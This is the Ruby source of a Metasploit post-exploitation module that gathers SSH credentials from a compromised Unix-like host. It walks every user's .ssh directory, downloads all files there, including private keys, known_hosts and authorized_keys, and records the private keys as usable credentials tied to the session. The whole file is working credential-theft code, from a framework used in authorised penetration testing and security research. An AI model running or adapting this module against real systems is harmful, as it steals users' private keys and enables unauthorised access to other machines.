1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'sshkey'
7

8
class MetasploitModule < Msf::Post
9
  include Msf::Post::File
10
  include Msf::Post::Unix
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'Multi Gather OpenSSH PKI Credentials Collection',
17
        'Description' => %q{
18
          This module will collect the contents of all users' .ssh directories on the targeted
19
          machine. Additionally, known_hosts and authorized_keys and any other files are also
20
          downloaded. This module is largely based on firefox_creds.rb.
21
        },
22
        'License' => MSF_LICENSE,
23
        'Author' => ['Jim Halfpenny'],
24
        'Platform' => %w[bsd linux osx unix],
25
        'SessionTypes' => ['meterpreter', 'shell' ],
26
        'Compat' => {
27
          'Meterpreter' => {
28
            'Commands' => %w[
29
              stdapi_fs_ls
30
              stdapi_fs_separator
31
            ]
32
          }
33
        },
34
        'Notes' => {
35
          'Stability' => [CRASH_SAFE],
36
          'SideEffects' => [],
37
          'Reliability' => []
38
        }
39
      )
40
    )
41
  end
42

43
  def run
44
    print_status('Finding .ssh directories')
45
    paths = enum_user_directories.map { |d| d + '/.ssh' }
46
    # Array#select! is only in 1.9
47
    paths = paths.select { |d| directory?(d) }
48

49
    if paths.nil? || paths.empty?
50
      print_error('No users found with a .ssh directory')
51
      return
52
    end
53

54
    print_status("Looting #{paths.count} .ssh directories")
55
    download_loot(paths)
56
  end
57

58
  def download_loot(paths)
59
    paths.each do |path|
60
      path.chomp!
61

62
      print_status("Looting #{path} directory")
63

64
      unless executable?(path)
65
        print_warning("Cannot access directory: #{path} . Missing execute permission. Skipping.")
66
        next
67
      end
68

69
      if session.type == 'meterpreter'
70
        sep = session.fs.file.separator
71
        files = session.fs.dir.entries(path)
72
      else
73
        # Guess, but it's probably right
74
        sep = '/'
75
        files = cmd_exec("ls -1 #{path}").split(/\r\n|\r|\n/)
76
      end
77
      path_array = path.split(sep)
78
      path_array.pop
79
      user = path_array.pop
80
      files.each do |file|
81
        next if ['.', '..'].include?(file)
82

83
        file_path = "#{path}#{sep}#{file}"
84

85
        unless readable?(file_path)
86
          print_warning("Cannot read file: #{file_path} . Missing read permission. Skipping.")
87
          next
88
        end
89

90
        data = read_file("#{path}#{sep}#{file}")
91
        file = file.split(sep).last
92

93
        loot_path = store_loot("ssh.#{file}", 'text/plain', session, data, "ssh_#{file}", "OpenSSH #{file} File")
94
        print_good("Downloaded #{path}#{sep}#{file} -> #{loot_path}")
95

96
        # store only ssh private keys
97
        next if SSHKey.valid_ssh_public_key? data
98

99
        begin
100
          key = SSHKey.new(data, passphrase: '')
101

102
          credential_data = {
103
            origin_type: :session,
104
            session_id: session_db_id,
105
            post_reference_name: refname,
106
            private_type: :ssh_key,
107
            private_data: key.key_object.to_s,
108
            username: user,
109
            workspace_id: myworkspace_id
110
          }
111

112
          create_credential(credential_data)
113
        rescue OpenSSL::OpenSSLError => e
114
          print_error("Could not load SSH Key: #{e.message}")
115
        end
116
      end
117
    end
118
  end
119
end
120

121